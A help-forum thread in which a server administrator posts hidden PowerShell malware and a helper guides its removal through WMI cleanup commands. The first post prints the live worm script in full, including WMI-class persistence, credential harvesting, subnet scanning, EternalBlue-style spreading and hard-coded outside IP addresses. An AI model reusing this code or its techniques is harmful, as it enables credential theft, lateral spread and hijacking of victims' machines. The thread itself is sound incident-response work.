Jump to content
Malzuko

Powershell running hidden script consuming 70% of cpu

Recommended Posts

Hello

I have been having an issue with our server at work recently and cant get to the bottom of it. Two Powershell windows keep opening in the background running a script one of which consuming a lot of CPU power. I can end the task or suspend the process but it always returns.

This machine hosts a domain and several users log into this server via remote desktop on the default port 3389

 

These are the scrips  - the first one is the one using 70% of the CPU

- the second one always appears first

 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

 

powershell.exe -NoP -NonI -W Hidden  -E $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S C M   E v e n t   L o g s ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " ) - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " ) )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
 	 $ s e = @ ( ' 1 0 7 . 1 7 9 . 6 7 . 2 4 3 ' , ' 1 7 2 . 2 4 7 . 1 1 6 . 8 ' )  
 	 $ n i c = ' 1 1 8 . 1 8 4 . 4 8 . 9 5 '  
 	 f o r e a c h ( $ t   i n   $ s e )  
 	 {  
 	 	 $ p i n = t e s t - c o n n e c t i o n   $ t  
 	 	 i f   ( $ p i n   - n e   $ n u l l )  
 	 	 {  
 	 	 	 $ n i c = $ t  
 	 	 	 b r e a k  
 	 	 }  
 	 }  
 	 $ n i c = $ n i c + " : 8 0 0 0 "  
  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) 

 

 

Addition.txt

FRST.txt

mb.txt

AdwCleaner[S1].txt

MyConsoleSettings.txt

MyScheduledTasks.txt

Share this post


Link to post
Share on other sites

Hi Malzuko :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.

  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread


This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Read the following:

https://forum.eset.com/topic/14143-powershell-script-100-cpu-load-malicious-attack/

Long story short, your server (and your network) have been compromised.

Did you delete the scheduled tasks that were launching these PowerShell scripts?

Share this post


Link to post
Share on other sites

I ran these scripts as instructed about a week ago:

 

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Filter'" |remOVe-WMIObject  -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM Event Consumer'" | Remove-WMIObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%SCM Event Consumer%'" | REmOVE-WMIObject -Verbose
([WmiClass]'root\default:Win32_TaskService') | Remove-WMIObject -Verbose

Get-WMIObject -Namespace root\Subscription -Class  ActiveScriptEventConsumer -Filter "Name='SCM Event Consumer'" | Remove-WMIObject -Verbose

 

I ran them again today the 3rd one comes back red but all the others return the the normal prompt - I believe when I ran them the first time, the first 2 commands returned with returned with yellow text

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Fil
ter'" |remOVe-WMIObject  -Verbose
PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM
 Event Consumer'" | Remove-WMIObject -Verbose
PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path L
IKE '%SCM Event Consumer%'" | REmOVE-WMIObject -Verbose
PS C:\Users\Administrator> ([WmiClass]'root\default:Win32_TaskService') | Remove-WMIObject -Verbose
Cannot convert value "root\default:Win32_TaskService" to type "System.Management.ManagementClass". Error: "Not found "
At line:1 char:1
+ ([WmiClass]'root\default:Win32_TaskService') | Remove-WMIObject -Verbose

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvalidCastToWMIClass

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class  ActiveScriptEventConsumer -Filter "Name='S
CM Event Consumer'" | Remove-WMIObject -Verbose
PS C:\Users\Administrator>

 

 - I also ran WMILister_23 - thru the process of doing that after a few screens it just kept saying possible embedded exe [ok]

  - I probably pushed [ok] 100 times - I ended up ending the task

 

 

DumptedScripts.txt

Share this post


Link to post
Share on other sites

Can you try this command instead?

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose

This one should go through.

Share this post


Link to post
Share on other sites

No luck with that. I tried it when it was running and when I have ended the take on it.

This was the response running an administrator powershell:

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs
 Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose
Remove-WMIObject : The input object cannot be bound to any parameters for the command either because the command does
not take pipeline input or the input and its properties do not match any of the parameters that take pipeline input.
At line:1 char:106
+ ... ogs Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Office_Update ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (\\WIN-K9REC7QI4...nt Logs Filter":PSObject) [Remove-WmiObject], Parame
   terBindingException
    + FullyQualifiedErrorId : InputObjectNotBound,Microsoft.PowerShell.Commands.RemoveWmiObject

PS C:\Users\Administrator>

Share this post


Link to post
Share on other sites

Try this, I think the way it was copy/pasted added too many spaces.

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs Filter'" | Remove-WMIObject -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose

 

Share this post


Link to post
Share on other sites

Still no luck,  does it matter if the script if running? because I have ended it for the till it appears again

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs
 Filter'" | Remove-WMIObject -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose
Remove-WMIObject : The input object cannot be bound to any parameters for the command either because the command does
not take pipeline input or the input and its properties do not match any of the parameters that take pipeline input.
At line:1 char:106
+ ... ogs Filter'" | Remove-WMIObject -Verbose ([WmiClass]'root\default:Office_Updater ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (\\WIN-K9REC7QI4...nt Logs Filter":PSObject) [Remove-WmiObject], Parame
   terBindingException
    + FullyQualifiedErrorId : InputObjectNotBound,Microsoft.PowerShell.Commands.RemoveWmiObject

PS C:\Users\Administrator>

Share this post


Link to post
Share on other sites

Yoan,

Fisrt I would like to thank you for your help so, it has been encouraging :)

Ive been poking around in Sysinternals and discovered some more information that may or may not help.

A lot of the scheduled task entries and the powershell entry share the same 10/28/2014 timestamp

Are these the scheduled tasks I need to delete ?

 

 

screenshot1.thumb.jpg.1cd883cf57510736fd94570fc787818b.jpgscreenshot2.thumb.jpg.4e47faca2e2ee20b2e58b4a4cf0c0b04.jpg

 

Share this post


Link to post
Share on other sites

Actually, simply delete the SCM Event Logs Consumer. It should do the trick. I'll see if I can find an easy way for you to delete the whole Office_updater as a whole.

Share this post


Link to post
Share on other sites

Now, if you restart the server (if you're able to), are the processes still present?

Share this post


Link to post
Share on other sites

I will have to wait till after business hours to restart the server. I will do so as soon as I can.

 

Share this post


Link to post
Share on other sites

Ok, I was able restart the server. Since I deleted the  SCM Event Logs Consumer entry PowerShell has not opened. I will be monitoring it periodically throughout the night.

 

Share this post


Link to post
Share on other sites

Awesome :) I'll look into the WMI stuff tomorrow. Let me know if it ever comeback in the meantime.

Share this post


Link to post
Share on other sites

We are still looking good here,   there has been no recurrence. Do you have any idea what this malware was doing?

Share this post


Link to post
Share on other sites

Good! Can you run the WMI_Lister23 script again to generate a new DumpedScripts.txt log?

Share this post


Link to post
Share on other sites

Maybe these commands will do the trick.

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%SCM Event Logs Consumer%'" | Remove-WMIObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM Event Logs Consumer'" | Remove-WMIObject -Verbose
Get-WMIObject -Namespace root\DEFAULT -Class Office_Updater | Remove-WMIObject -Verbose ([WmiClass]'root\DEFAULT:Office_Updater') | Remove-WMIObject -Verbose

 

Share this post


Link to post
Share on other sites

Alright I ran those - I marked the one that returned yellow with the orange text. I also ran WMILister again,

DumptedScripts.txt

 

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path L
IKE '%SCM Event Logs Consumer%'" | Remove-WMIObject -Verbose
VERBOSE: Performing the operation "Remove-WmiObject" on target
"\\WIN-K9REC7QI4JS\ROOT\Subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"SCM Event Logs
 Consumer\"",Filter="__EventFilter.Name=\"SCM Event Logs Filter\""".

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM
 Event Logs Consumer'" | Remove-WMIObject -Verbose
PS C:\Users\Administrator> Get-WMIObject -Namespace root\DEFAULT -Class Office_Updater | Remove-WMIObject -Verbose ([Wmi
Class]'root\DEFAULT:Office_Updater') | Remove-WMIObject -Verbose
PS C:\Users\Administrator>

Share this post


Link to post
Share on other sites

Alright so the only thing left to remove is root\DEFAULT:Office_Updater... Ever used wbemtest.exe? I think it would be the easiest way. Launch it, connect to root\DEFAULT, click on the Enumerate Classes button, check the Recursive option, enter nothing in the Superclass field and click on Ok. From there, find Office_Updater and delete it.

Share this post


Link to post
Share on other sites

Awesome! It does look clean indeed :) No traces of any rogue WMI entries left!

We can keep the thread open till tomorrow, just in case the infection returns, but I think we got it.

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.